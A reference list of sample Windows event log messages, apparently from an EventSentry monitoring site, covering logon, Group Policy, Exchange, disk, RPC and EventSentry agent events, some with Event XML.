The configuration for the agent (service) could not be re-read because the "Log File Monitoring" feature/function is busy and preventing an on-line configuration update. You can try to save the configuration again at a later time, or restart the EventSentry service to force a configuration update.


Event ID:
Source:
Microsoft-Windows-Hyper-V-Worker-Admin
Message:
'VM-SRV-001' started successfully. (Virtual machine ID D8EB8812-63FE-468A-9545-1E2028EC1F5F)


Event ID:
Source:
Microsoft Windows security
Category:
System Integrity
Message:
Code Integrity determined that the page hashes of an image file are not valid. The file could be improperly signed without page hashes or corrupt due to unauthorized modification. The invalid hashes could indicate a potential disk device error.
File Name: \Device\HarddiskVolume3\Windows\System32\sysfer.dll


Event ID:
Source:
User profile service
Message:
Log Name: Application
Source: Microsoft-Windows-User Profiles Service
Date: 5/12/2012 4:13:40 PM
Event ID: 1530
Task Category: None
Level: Warning
Keywords:
User: SYSTEM
Computer: NONEOFYOURBIZ2
Description:
Windows detected your registry file is still in use by other applications or services. The file will be unloaded now. The applications or services that hold your registry file may not function properly afterwards.

DETAIL -
9 user registry handles leaked from \Registry\User\S-1-5-21-664570727-300873648-2978798648-1000:
Process 664 (\Device\HarddiskVolume2\Windows\System32\lsass.exe) has opened key \REGISTRY\USER\S-1-5-21-664570727-300873648-2978798648-1000
Process 664 (\Device\HarddiskVolume2\Windows\System32\lsass.exe) has opened key \REGISTRY\USER\S-1-5-21-664570727-300873648-2978798648-1000
Process 1324 (\Device\HarddiskVolume2\Windows\System32\FBAgent.exe) has opened key \REGISTRY\USER\S-1-5-21-664570727-300873648-2978798648-1000
Process 1324 (\Device\HarddiskVolume2\Windows\System32\FBAgent.exe) has opened key \REGISTRY\USER\S-1-5-21-664570727-300873648-2978798648-1000
Process 1324 (\Device\HarddiskVolume2\Windows\System32\FBAgent.exe) has opened key \REGISTRY\USER\S-1-5-21-664570727-300873648-2978798648-1000
Process 664 (\Device\HarddiskVolume2\Windows\System32\lsass.exe) has opened key \REGISTRY\USER\S-1-5-21-664570727-300873648-2978798648-1000\Software\Microsoft\SystemCertificates\My
Process 664 (\Device\HarddiskVolume2\Windows\System32\lsass.exe) has opened key \REGISTRY\USER\S-1-5-21-664570727-300873648-2978798648-1000\Software\Microsoft\SystemCertificates\CA
Process 664 (\Device\HarddiskVolume2\Windows\System32\lsass.exe) has opened key \REGISTRY\USER\S-1-5-21-664570727-300873648-2978798648-1000\Software\Microsoft\SystemCertificates\Disallowed
Process 1324 (\Device\HarddiskVolume2\Windows\System32\FBAgent.exe) has opened key \REGISTRY\USER\S-1-5-21-664570727-300873648-2978798648-1000\Software\Microsoft\Windows\CurrentVersion\Explorer

Event Xml:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System>
<Provider Name="Microsoft-Windows-User Profiles Service" Guid="{89B1E9F0-5AFF-44A6-9B44-0A07A7CE5845}" />
<EventID>1530</EventID>
<Version>0</Version>
<Level>3</Level>
<Task>0</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime="2012-05-12T20:13:40.907441900Z" />
<EventRecordID>30031</EventRecordID>
<Correlation />
<Execution ProcessID="416" ThreadID="4684" />
<Channel>Application</Channel>
<Computer>NONEOFYOURBIZ2</Computer>
<Security UserID="S-1-5-18" />
</System>
<EventData Name="EVENT_HIVE_LEAK">
<Data Name="Detail">9 user registry handles leaked from \Registry\User\S-1-5-21-664570727-300873648-2978798648-1000:
Process 664 (\Device\HarddiskVolume2\Windows\System32\lsass.exe) has opened key \REGISTRY\USER\S-1-5-21-664570727-300873648-2978798648-1000
Process 664 (\Device\HarddiskVolume2\Windows\System32\lsass.exe) has opened key \REGISTRY\USER\S-1-5-21-664570727-300873648-2978798648-1000
Process 1324 (\Device\HarddiskVolume2\Windows\System32\FBAgent.exe) has opened key \REGISTRY\USER\S-1-5-21-664570727-300873648-2978798648-1000
Process 1324 (\Device\HarddiskVolume2\Windows\System32\FBAgent.exe) has opened key \REGISTRY\USER\S-1-5-21-664570727-300873648-2978798648-1000
Process 1324 (\Device\HarddiskVolume2\Windows\System32\FBAgent.exe) has opened key \REGISTRY\USER\S-1-5-21-664570727-300873648-2978798648-1000
Process 664 (\Device\HarddiskVolume2\Windows\System32\lsass.exe) has opened key \REGISTRY\USER\S-1-5-21-664570727-300873648-2978798648-1000\Software\Microsoft\SystemCertificates\My
Process 664 (\Device\HarddiskVolume2\Windows\System32\lsass.exe) has opened key \REGISTRY\USER\S-1-5-21-664570727-300873648-2978798648-1000\Software\Microsoft\SystemCertificates\CA
Process 664 (\Device\HarddiskVolume2\Windows\System32\lsass.exe) has opened key \REGISTRY\USER\S-1-5-21-664570727-300873648-2978798648-1000\Software\Microsoft\SystemCertificates\Disallowed
Process 1324 (\Device\HarddiskVolume2\Windows\System32\FBAgent.exe) has opened key \REGISTRY\USER\S-1-5-21-664570727-300873648-2978798648-1000\Software\Microsoft\Windows\CurrentVersion\Explorer
</Data>
</EventData>
</Event>


Event ID:
Source:
Microsoft-Windows-GroupPolicy
Message:
The processing of Group Policy failed. Windows could not evaluate the Windows Management Instrumentation (WMI) filter for the Group Policy object cn={D3610029-DDDD-4141-AAAA-FDFFFFCCBB22},cn=policies,cn=system,DC=yourdomain,DC=local. This could be caused by RSOP being disabled or Windows Management Instrumentation (WMI) service being disabled, stopped, or other WMI errors. Make sure the WMI service is started and the startup type is set to automatic. New Group Policy objects or settings will not process until this event has been resolved.


Event ID:
Source:
Service Control Manager
Message:
The EventSentry service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 60000 milliseconds: Restart the service.


Event ID:
Source:
srv
Message:
The server was unable to allocate from the system nonpaged pool because the server reached the configured limit for nonpaged pool allocations.


Event ID:
Source:
Microsoft-Windows-Security-Auditing
Category:
Logoff
Message:
An account was logged off.

Subject:
Security ID: Domain\ad2user
Account Name: ad1user
Account Domain: Domain
Logon ID: 0xbb55b23

Logon Type: 3

This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.



Event ID:
Source:
Microsoft-Windows-CertificateServicesClient-AutoEnrollment
Message:
Certificate for %1 with Thumbprint %2 is about to expire or has already expired.


Event ID:
Source:
ati2mtag
Category:
POWERPLAY
Message:
System shutdown due to graphics card overheating.


Event ID:
Source:
Disk
Message:
The driver detected a controller error on \Device\Harddisk1\%.


Event ID:
Source:
Service Control Manager
Message:
The VNC Server Version 4 service terminated unexpectedly. It has done this 1 time(s)


Event ID:
Source:
Security
Category:
Logon/Logoff
Message:
An account was successfully logged on.

Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WORKSTATION123$
Account Domain: CORPDOMAIN
Logon ID: 0x3e7

Logon Type: 7

New Logon:
Security ID: CORPDOMAIN\john.doe
Account Name: john.doe
Account Domain: CORPDOMAIN
Logon ID: 0xf3e668
Logon GUID: {00000000-0000-0000-0000-000000000000}

Process Information:
Process ID: 0x314
Process Name: C:\Windows\System32\winlogon.exe

Network Information:
Workstation Name: WORKSTATION123
Source Network Address: 127.0.0.1
Source Port: 0

Detailed Authentication Information:
Logon Process: User32
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0


Event ID:
Source:
Security
Message:
A new process has been created.

Subject:
Security ID: CORPDOMAIN\jack.doe
Account Name: jack.doe
Account Domain: CORPDOMAIN
Logon ID: 0xc2b4c

Process Information:
New Process ID: 0xcec0
New Process Name: C:\Windows\System32\PING.EXE
Token Elevation Type: TokenElevationTypeLimited (2)
Creator Process ID: 0x116c


Event ID:
Source:
e1iexpress
Message:
Intel(R) 82574L Gigabit Network Connection
Network link is disconnected.


Event ID:
Source:
Service Control Manager
Message:
The Creative Audio Service service failed to start due to the following error:
The system cannot find the file specified.


Event ID:
Source:
Kernel-PnP
Message:
The driver \Driver\WUDFRd failed to load for the device WpdBusEnumRoot\UMB\2&37c186b&0&STORAGE#VOLUME#_??_USBSTOR#DISK&VEN_GENERIC-&PROD_COMPACT_FLASH&REV_1.01#7&1C4905A4&0&058F63646476&1#.


Event ID:
Source:
Windows Media Player Network Sharing Service
Message:
Service 'WMPNetworkSvc' did not start correctly because CoCreateInstance(CLSID_UPnPDeviceFinder) encountered error '0x80004005'. Verify that the UPnPHost service is running and that the UPnPHost component of Windows is installed properly.


Event ID:
Source:
Security
Category:
Other Logon/Logoff Events
Message:
The workstation was locked.

Subject:
Security ID: GOTHAM\bat.man
Account Name: bat.man
Account Domain: GOTHAM
Logon ID: 0x19a2e6
Session ID: 1


Event ID:
Source:
Security
Category:
Other Logon/Logoff Events
Message:
The workstation was unlocked.

Subject:
Security ID: GOTHAM\bat.man
Account Name: bat.man
Account Domain: GOTHAM
Logon ID: 0x19a2e6
Session ID: 1


Event ID:
Source:
Security
Category:
User Account Management
Message:
A user account was locked out.
Subject:
Security ID: SYSTEM
Account Name: CORPDC1$
Account Domain: CORPDOMAIN
Logon ID: 0x3e7
Account That Was Locked Out:
Security ID: S-1-5-21-1179352123-210183264333-1239653321-8754
Account Name: beth.jackson
Additional Information:
Caller Computer Name: CORPDC1


Event ID:
Source:
EventSentry
Message:
EventSentry is caching more than 1024 files in the monitored directory C:\Web. To keep the resource consumption of the EventSentry agent low it is recommended that you move old files to a sub directory or another directory.


Event ID:
Source:
Microsoft-Windows-Security-Auditing
Category:
File System
Message:
A handle to an object was requested.

Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: COMPUTER$
Account Domain: DOMAIN
Logon ID: 0x3E7

Object:
Object Server: Security
Object Type: File
Object Name: C:\Windows\WinSxS\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.0.9200.16384_none_8325ae6a331660a6\GdiPlus.dll
Handle ID: 0x0
Resource Attributes: -

Process Information:
Process ID: 0x354
Process Name: C:\Windows\System32\svchost.exe

Access Request Information:
Transaction ID: {00000000-0000-0000-0000-000000000000}
Accesses: READ_CONTROL
SYNCHRONIZE
ReadData (or ListDirectory)
ReadEA
ReadAttributes
WriteAttributes

Access Reasons: READ_CONTROL: Granted by D:(A;;0x1200a9;;;BA)
SYNCHRONIZE: Granted by D:(A;;0x1200a9;;;BA)
ReadData (or ListDirectory): Granted by D:(A;;0x1200a9;;;BA)
ReadEA: Granted by D:(A;;0x1200a9;;;BA)
ReadAttributes: Granted by ACE on parent folder D:(A;;0x1200a9;;;BA)
WriteAttributes: Not granted

Access Mask: 0x120189
Privileges Used for Access Check: -
Restricted SID Count: 0


Event ID:
Source:
EventSentry
Message:
Action "%1" was unable to create a TCP connection with host "%2" due to error: %3


Event ID:
Source:
EventSentry
Message:
Action "%1" was unable to create a UDP socket to connect to host "%2" due to error: %3


Event ID:
Source:
EventSentry
Message:
EventSentry was unable to connect to the ODBC target %1 due to error "%2". EventSentry will cache data and forward it to the ODBC target once the database has become available again.


Event ID:
Source:
EventSentry
Message:
Action "%1" was unable to send a message to host "%2" due to error: %3


Event ID:
Source:
EventSentry
Message:
Action "%1" triggered process "%2", which ran for %3 seconds with the result shown below. Return code was %4.
%5


Event ID:
Source:
EventSentry
Message:
The process action "%1" was unable to execute process "%2" due to error "%3".


Event ID:
Source:
EventSentry
Message:
Process %1 (triggered by action "%2") exceeded the maximum allowed time interval of %3 minute(s) and EventSentry was unable to terminate the process due to the following error:

%4


Event ID:
Source:
EventSentry
Message:
Process %1 (triggered by action "%2") exceeded the maximum allowed time interval of %3 minute(s) and the process was terminated. Please increase the timeout interval for this process in the management application (System Health -> Application Scheduler).


Event ID:
Source:
EventSentry
Message:
Action "%1" triggered process "%2" successfully.


Event ID:
Source:
EventSentry
Message:
Action "%1" was unable to send trap to SNMP host "%2" due to error: %3


Event ID:
Source:
EventSentry
Message:
Action "%1" was unable to connect to SNPP host "%2" due to error: %3


Event ID:
Source:
EventSentry
Message:
Action "%1" was unable to send a message to pager ID "%2" due to error: %3


Event ID:
Source:
EventSentry
Message:
Action "%1" was unable to send the message due to error: %2


Event ID:
Source:
EventSentry
Message:
Unable to connect to the SCM (service control manager) due to error %1 (%2). The action "%3" failed to execute.


Event ID:
Source:
EventSentry
Message:
Unable to open the requested service (%1) due to error %2 (%3). The action "%4" failed to execute.


Event ID:
Source:
EventSentry
Message:
Unable to send the requested control to service %1, most likely due to error %2 (%3). The action "%4" failed to execute.


Event ID:
Source:
EventSentry
Message:
The checksum for executable file "%1" changed from the original checksum "%2". Only the EventSentry agent should have access to this file. This change indicates a potential security breach, and the process will not be launched. The contents of the file should be verified; restarting the EventSentry will re-create the file.


Event ID:
Source:
EventSentry
Message:
The service %1 could not be restarted because it could not be stopped in the first place. The notification "%2" failed to execute.


Event ID:
Source:
EventSentry
Message:
The requested service control was successfully sent to service %1, however the current service status is still %2. Please monitor the status of the %1 service to ensure it is in the desired state.


Event ID:
Source:
EventSentry
Message:
The process "%1" was terminated successfully.

Instances Terminated: %2.
Affected Process Identifiers (PIDs): %3


Event ID:
Source:
EventSentry
Message:
The process "%1" could not be terminated due to error "%2".


Event ID:
Source:
EventSentry
Message:
Action "%1" was unable to initiate a system shutdown/reboot due to error: %3


Event ID:
Source:
EventSentry
Message:
Action "%1" was unable to connect to Jabber host "%2" due to error: %3


Event ID:
Source:
EventSentry
Message:
Action "%1" was unable to send a message to chat room "%2" due to error: %3


Event ID:
Source:
EventSentry
Message:
Action "%1" was unable to submit an event to "%2" due to error "%3".


Event ID:
Source:
EventSentry
Message:
Action "%1" successfully submitted event with number %3 to "%2".


Event ID:
Source:
EventSentry
Message:
The EventSentry agent is ready.

Version: %1
Codepage: %2

The following packages are assigned:

Event Log Packages:
-------------------
%3
Log File Packages:
-------------------
%4
System Health Packages:
-----------------------
%5
Compliance Tracking Packages:
-----------------------------
%6



Event ID:
Source:
EventSentry
Message:
The EventSentry agent is stopping


Event ID:
Source:
EventSentry
Message:
EventSentry has successfully re-opened a handle to the "%1" event log after it has become invalid due to error "%2".


Event ID:
Source:
EventSentry
Message:
Unable to allocate memory (for %1) in routine %2


Event ID:
Source:
EventSentry
Message:
The agent was unable to find the local hostname (%1, %2) in the configuration, mostly due to a license problem. Make sure that only as many full hosts are configured in the EventSentry groups as licenses are installed. Note that Heartbeat-Only hosts which have the "Monitor Agent" option set count towards full host licenses.


Event ID:
Source:
KDC
Message:
4/18/2013 9:42:41 AM
While processing a TGS request for the target server krbtgt/DOMAIN.LOCAL, the account DESKTOP04$@DOMAIN.LOCAL did not have a suitable key for generating a Kerberos ticket (the missing key has an ID of 8). The requested etypes were 18. The accounts available etypes were 23 -133 -128 3 1.



Event ID:
Source:
EventSentry
Category:
Service Monitoring
Message:
The status for the service trustedinstaller(Windows Modules Installer) changed from Running to Stopped.
Additional Information:

Startup Type: manual
Executable: C:\Windows\servicing\TrustedInstaller.exe
Service account: LocalSystem


Event ID:
Source:
Microsoft-Windows-FailoverClustering
Message:
Cluster Shared Volume 'Volume2' ('ClusterStorage Volume 2') is no longer available on this node because of 'STATUS_CLUSTER_CSV_AUTO_PAUSE_ERROR(c0130021)'. All I/O will temporarily be queued until a path to the volume is reestablished.


Event ID:
Source:
MSExchangeAL
Category:
LDAP Operations
Message:
LDAP Bind was unsuccessful on directory OLDDC.domain.local for distinguished name ''. Directory returned error:[0x51] Server Down.

For more information, click http://www.microsoft.com/contentredirect.asp.


Event ID:
Source:
MSExchange SACL Watcher
Message:
SACL Watcher servicelet found that the SeSecurityPrivilege privilege is removed from account MYDOMAIN\Exchange Servers.


Event ID:
Source:
disk
Message:
The IO operation at logical block address fd90027 for Disk 3 was retried.


Event ID:
Source:
EventSentry
Category:
Performance Monitoring
Message:
The performance counter "Performance System\Average Disk Queue Length" (PhysicalDisk(*)\Avg. Disk Queue Length) could not be monitored. Please make sure that the performance counter exists. If you are running a non-English version then you might have to adapt the name of the performance counter so it matches the language of the Operating System.


Event ID:
Source:
EventLog
Message:
The ES Network Services log file is full.


Event ID:
Source:
Server Administrator
Category:
Storage Service
Message:
The controller debug log file has been exported.: Controller 0 (PERC 5/i Integrated)


Event ID:
Source:
Server Administrator
Category:
Storage Service
Message:
The controller write policy has been changed to Write Through.


Event ID:
Source:
System Error
Category:
102 (no category messagefile registered)
Message:
Error code 0000009c, parameter1 00000000, parameter2 bab3c050, parameter3 b6514000, parameter4 00000145.


Event ID:
Source:
Microsoft-Windows-GroupPolicy
Message:
The processing of Group Policy failed because of lack of network connectivity to a domain controller. This may be a transient condition. A success message would be generated once the machine gets connected to the domain controller and Group Policy has successfully processed. If you do not see a success message for several hours, then contact your administrator.



Event ID:
Source:
Microsoft-Windows-TaskScheduler/Operational
Category:
Task Start Failed
Message:
Task Scheduler failed to start "\Some Important Task" task for user "MYDOMAIN\EventMonitor". Additional Data: Error Value: 2147942402.


Event ID:
Source:
Microsoft-Windows-Hyper-V-Worker
Message:
Device 'Microsoft Synthetic Display Controller' in 'SERVER01' is loaded but has a different version from the server. Server version 3.0 Client version 3.2 (Virtual machine ID 8D6415C4-6E44-78FC-6BB8-34CCA67ACF48). The device will work, but this is an unsupported configuration. This means that technical support will not be provided until this problem is resolved. To fix this problem, upgrade the integration services. To upgrade, connect to the virtual machine and select Insert Integration Services Setup Disk from the Action menu.


Event ID:
Source:
SAVOnAccess
Message:
Insufficient memory.


Event ID:
Source:
DNS
Category:
None
Message:
The DNS server has encountered numerous run-time events. To determine the initial cause of these run-time events, examine the DNS server event log entries that precede this event. To prevent the DNS server from filling the event log too quickly, subsequent events with Event IDs higher than 3000 will be suppressed until events are no longer being generated at a high rate.


Event ID:
Source:
emfprint
Category:
print processor
Message:
4aCreateFile(C:\WINDOWS\System32\spool\PRINTERS\00176.spl) succeeded


Event ID:
Source:
WinLogon
Message:
The winlogon notification subscriber <Profiles> took nnn second(s) to handle the notification event (Logon).


Event ID:
Source:
Office SharePoint Server
Category:
Office Server Shared Services
Message:
Application Server Administration job failed for service instance Microsoft.Office.Server.Search.Administration.SearchServiceInstance (dbb94537-db22-448b-92c9-d1f684a4a13e).

Reason: Could not find file 'C:\WINDOWS\system32\drivers\etc\HOSTS'.

Technical Support Details:
System.IO.FileNotFoundException: Could not find file 'C:\WINDOWS\system32\drivers\etc\HOSTS'.
File name: 'C:\WINDOWS\system32\drivers\etc\HOSTS'
at System.IO.__Error.WinIOError(Int32 errorCode, String maybeFullPath)
at System.IO.FileStream.Init(String path, FileMode mode, FileAccess access, Int32 rights, Boolean useRights, FileShare share, Int32 bufferSize, FileOptions options, SECURITY_ATTRIBUTES secAttrs, String msgPath, Boolean bFromProxy)
at System.IO.FileStream..ctor(String path, FileMode mode, FileAccess access, FileShare share, Int32 bufferSize, FileOptions options)
at System.IO.StreamReader..ctor(String path, Encoding encoding, Boolean detectEncodingFromByteOrderMarks, Int32 bufferSize)
at System.IO.FileInfo.OpenText()
at Microsoft.Search.Administration.Security.HOSTSFile.ParseHOSTSFile(Hashtable& HOSTSFileMappings, StringBuilder& HOSTSComments)
at Microsoft.Search.Administration.Security.HOSTSFile.ConfigureDedicatedGathering(SearchServiceInstance searchServiceInstance, SPServer dedicatedWebFrontEndServer, IList`1 previousWebApplicationHostNames)
at Microsoft.Office.Server.Search.Administration.SearchServiceInstance.SynchronizeDefaultContentSource(IDictionary applications)
at Microsoft.Office.Server.Search.Administration.SearchServiceInstance.Synchronize()
at Microsoft.Office.Server.Administration.ApplicationServerJob.ProvisionLocalSharedServiceInstances(Boolean isAdministrationServiceJob)


Event ID:
Source:
Search
Message:
Could not get performance counter registry information for WSearchIdxPi for instance due to the following error: The operation completed successfully. 0x0.


Event ID:
Source:
Search
Message:
Performance monitoring cannot be initialised for the gatherer object, because the counters are not loaded or the shared memory object cannot be opened. This only affects availability of the perfmon counters. Restart the computer.

Context: Application, SystemIndex Catalogue


Event ID:
Source:
Search
Message:
Performance monitoring cannot be initialised for the gatherer service, because the counters are not loaded or the shared memory object cannot be opened. This only affects availability of the perfmon counters. Restart the computer.


Event ID:
Source:
Kernel-PnP
Category:
(212)
Message:
The driver \Driver\WUDFRd failed to load for the device SWD\WPDBUSENUM\{e21c02d7-760e-11e3-be76-806e6f6e6963}#000000000003F000.


Event ID:
Source:
e1iexpress
Message:
The description for Event ID 27 from source e1iexpress cannot be found. Either the component that raises this event is not installed on your local computer or the installation is corrupted. You can install or repair the component on the local computer.
If the event originated on another computer, the display information had to be saved with the event.
The following information was included with the event:
Intel(R) 82583V Gigabit Network Connection
the message resource is present but the message is not found in the string/message table


Event ID:
Source:
Display
Message:
Display driver amdkmdap stopped responding.


Event ID:
Source:
SecurityCenter
Message:
windows security center service could not stop windows defender


Event ID:
Source:
PerfNet
Message:
Unable to open the Server service performance object. The first four bytes (DWORD) of the Data section contains the status code.


Event ID:
Source:
NETLOGON
Category:
None
Message:
There are currently no logon servers available to service the logon request.
This may lead to authentication problems. Make sure that this computer is connected to the network. If the problem persists, please contact your domain administrator.


Event ID:
Source:
ESENT
Category:
Logging/Recovery
Message:
LiveComm (6812) C:\Users\Marion\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\LiveComm\d7436ff03206bcfd\120712-0049\: The shadow header page of file C:\Users\Marion\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\LiveComm\d7436ff03206bcfd\120712-0049\DBStore\livecomm.edb was damaged. The primary header page (8192 octets) was used instead.


Event ID:
Source:
NtServicePack
Category:
None
Message:
Windows XP WIC installation failed.
Access is denied.


Event ID:
Source:
VMware Tools
Message:
[ warning] [vmusr:vmtoolsd] Failed registration of app type 2 (Signals) from plugin unity.


Event ID:
Source:
Microsoft-Windows-CertificateServicesClient-CertEnroll
Message:
Certificate enrollment for Local system failed to enroll for a DomainController certificate with request ID N/A from testsql.domain.local\TESTCA (The RPC server is unavailable. 0x800706ba (WIN32: 1722)).


Event ID:
Source:
NETLOGON
Message:
This computer was not able to set up a secure session with a domain controller in domain NETIKUS due to the following:
There are currently no logon servers available to service the logon request.
This may lead to authentication problems. Make sure that this computer is connected to the network. If the problem persists, please contact your domain administrator.

ADDITIONAL INFO
If this computer is a domain controller for the specified domain, it sets up the secure session to the primary domain controller emulator in the specified domain. Otherwise, this computer sets up the secure session to any domain controller in the specified domain.


Event ID:
Source:
Microsoft-Windows-IIS-W3SVC-PerfCounters
Message:
It has taken too long to refresh the W3SVC counters, the stale counters are being used instead.


Event ID:
Source:
MSExchange Mid-Tier Storage
Message:
Ping of mdb 'b001e27b-bd30-4b98-998d-d0baf7803fba' timed out after '00:00:00' minutes. Last successful ping was at '6/10/2014 11:50:11 AM' UTC.


Event ID:
Source:
MSExchange EdgeSync
Category:
Initialization
Message:
Initialization failed with exception: Microsoft.Exchange.EdgeSync.Common.EdgeSyncServiceConfigNotFoundException: Couldn't find EdgeSync service configuration object for the site SiteName. If the configuration object doesn't exist in the Active Directory location CN=EdgeSyncService,CN=SiteName,CN=Sites,CN=Configuration,DC=domain,DC=local, create it using the New-EdgeSyncServiceConfig cmdlet. If the object does exist, check its permissions. If this warning frequently occurs, contact Microsoft Product Support.


Event ID:
Source:
ntfs
Category:
2
Message:
The default transaction resource manager on volume C: encountered a non-retryable error and could not start. The data contains the error code.

<Keywords>0x80000000000000</Keywords>


Event ID:
Source:
RPC (Microsoft-Windows-RPC-Events)
Message:
Possible Memory Leak. Application (C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted) (PID: 980) has passed a non-NULL pointer to RPC for an [out] parameter marked [allocate(all_nodes)]. [allocate(all_nodes)] parameters are always reallocated; if the original pointer contained the address of valid memory, that memory will be leaked. The call originated on the interface with UUID ({3f31c91e-2545-4b7b-9311-9529e8bffef6}), Method number (10). User Action: Contact your application vendor for an updated version of the application.

Detailed XML View

<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System>
<Provider Name="Microsoft-Windows-RPC-Events" Guid="{F4AED7C7-A898-4627-B053-44A7CAA12FCD}" />
<EventID>11</EventID>
<Version>0</Version>
<Level>3</Level>
<Task>0</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime="2014-07-21T09:20:57.835029200Z" />
<EventRecordID>136</EventRecordID>
<Correlation />
<Execution ProcessID="980" ThreadID="112" />
<Channel>Application</Channel>
<Computer>Pochi-01</Computer>
<Security UserID="S-1-5-19" />
</System>
<EventData>
<Data Name="ApplicationName">C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted</Data>
<Data Name="ProcessId">980</Data>
<Data Name="InterfaceId">{3F31C91E-2545-4B7B-9311-9529E8BFFEF6}</Data>
<Data Name="Method">10</Data>
</EventData>
</Event>


Event ID:
Source:
EventSentry
Message:
Der Dienststatus von Dienst eventsentryheartbeatmonitor (EventSentry Heartbeat Monitor) ist weiterhin Stopped.

Zusätzliche Dienstinformationen:

Starttyp: Automatic
EXE-Datei: C:\WINDOWS\SYSWOW64\EVENTSENTRY\EVENTSENTRY_HB_SVC.EXE
Benutzerkonto: LocalSystem


Event ID:
Source:
PostgreSQL
Message:
ERROR: duplicate key value violates unique constraint "idx_es_logontracking_unique"
DETAIL: Key (computername, username, start_unix, logonid)=(2, 30, 1409919385, 0xedeedc2f) already exists.
STATEMENT: insert into eventsentry.ESLogonTracking (start_unix,start_datetime,computername,groupname,username,LogonID,SourceIP,SourceComputer,ComputerProductType,eventnumber,RemoteDesktopState,incomplete,duration,LogonType,IsSession) values(1409919385,'2014-09-05 12:16:25'::timestamp,2,3,30,'0xedeedc2f',3,13,'SRV',0,1,0,0,10,1)


Event ID:
Source:
MSExchangeIS Mailbox Store
Category:
Content Indexing
Message:
Content Indexing function 'CISearch::EcGetRowsetAndAccessor' received an unusual and unexpected error code from MSSearch.
Mailbox Database: Mailbox Database
Error Code: 0x80041606


Event ID:
Source:
EventSentry
Category:
NTP Synchronization
Message:
EventSentry was unable to retrieve the current time from host ntp.mydomain.local due to the following error: Server time not synchronised.


Event ID:
Source:
Microsoft-Windows-Time-Service
Message:
NtpClient was unable to set a domain peer to use as a time source because of discovery error. NtpClient will try again in 15 minutes and double the reattempt interval thereafter. The error was: The entry is not found. (0x800706E1)


Event ID:
Source:
Service Control Manager
Message:
De Windows Presentation Foundation Font Cache 3.0.0.0-service is bij het starten vastgelopen.


Event ID:
Source:
MSExchangeIS Mailbox
Category:
Content Indexing
Message:
Function CISearch::EcGetRowsetAndAccessor detected that content indexing was disabled for database "Mailbox Database 1144709849" because of error "0x80041820" from MSSearch.


Event ID:
Source:
Windows Server Update Services
Category:
Clients
Message:
No client computers have ever contacted the server.


Event ID:
Source:
Microsoft-Windows-CAPI2
Message:
Reached crypt32 threshold of 50 events and will suspend logging for 60 minutes.


Event ID:
Source:
Server Administrator
Message:
Log size is no longer near or at capacity
Log type: ESM



Event ID:
Source:
SChannel
Message:
The following fatal alert was received: 42.


Event ID:
Source:
ESENT
Category:
General
Message:
WUDFHost (8232) WindowsLocationProviderDatabase: An attempt to open the file "C:\ProgramData\Microsoft\Windows\LocationProvider\edbtmp.log" for read / write access failed with system error 5 (0x00000005): "Access is denied. ". The open file operation will fail with error -1032 (0xfffffbf8).


Event ID:
Source:
Microsoft-Windows-CAPI2
Message:
Cryptographic Services failed while processing the OnIdentity() call in the System Writer Object.
Details:
AddLegacyDriverFiles: Unable to back up image of binary Microsoft Link-Layer Discovery Protocol.
System Error:
Access is denied.


Event ID:
Source:
MSExchangeTransport
Category:
SmtpReceive
Message:
Receive connector Allow SMTP rejected an incoming connection from IP address 1.2.3.4. The maximum number of connections per source (20) for this connector has been reached by this source IP address.


Event ID:
Source:
MSExchangeTransport
Category:
RemoteDelivery
Message:
A message with the Internal Message ID 12345 was rejected by the remote server. This message will be deferred and retried because it was marked for retry if rejected. Other messages may also have encountered this error.


Event ID:
Source:
User32
Message:
The attempt by user DOMAIN\someuser to logoff computer WKS123 failed


Event ID:
Source:
Userenv
Message:
Windows cannot determine the user or computer name. (Not enough storage is available to complete this operation. )


Event ID:
Source:
RPC (Microsoft-Windows-RPC-Events)
Category:
none
Message:
Log Name: Application
Source: Microsoft-Windows-RPC-Events
Date: 22/07/2015 13:43:53
Event ID: 11
Task Category: None
Level: Warning
Keywords:
User: LOCAL SERVICE
Computer: UNDERTHEBED7-PC
Description:
Possible Memory Leak. Application (C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted) (PID: 940) has passed a non-NULL pointer to RPC for an [out] parameter marked [allocate(all_nodes)]. [allocate(all_nodes)] parameters are always reallocated; if the original pointer contained the address of valid memory, that memory will be leaked. The call originated on the interface with UUID ({3f31c91e-2545-4b7b-9311-9529e8bffef6}), Method number (20). User Action: Contact your application vendor for an updated version of the application.
Event Xml:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System>
<Provider Name="Microsoft-Windows-RPC-Events" Guid="{F4AED7C7-A898-4627-B053-44A7CAA12FCD}" />
<EventID>11</EventID>
<Version>0</Version>
<Level>3</Level>
<Task>0</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime="2015-07-22T12:43:53.117673400Z" />
<EventRecordID>138</EventRecordID>
<Correlation />
<Execution ProcessID="940" ThreadID="1592" />
<Channel>Application</Channel>
<Computer>UNDERTHEBED7-PC</Computer>
<Security UserID="S-1-5-19" />
</System>
<EventData>
<Data Name="ApplicationName">C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted</Data>
<Data Name="ProcessId">940</Data>
<Data Name="InterfaceId">{3F31C91E-2545-4B7B-9311-9529E8BFFEF6}</Data>
<Data Name="Method">20</Data>
</EventData>
</Event>


Event ID:
Source:
dns issue
Message:
The first Critical Blacklist Event found: Event ID - 1054 System log - Microsoft-Windows-GroupPolicy: The processing of Group Policy failed. Windows could not obtain the name of a domain controller. This could be caused by a name resolution failure. Verify your Domain Name System (DNS) is configured and working correctly.


Event ID:
Source:
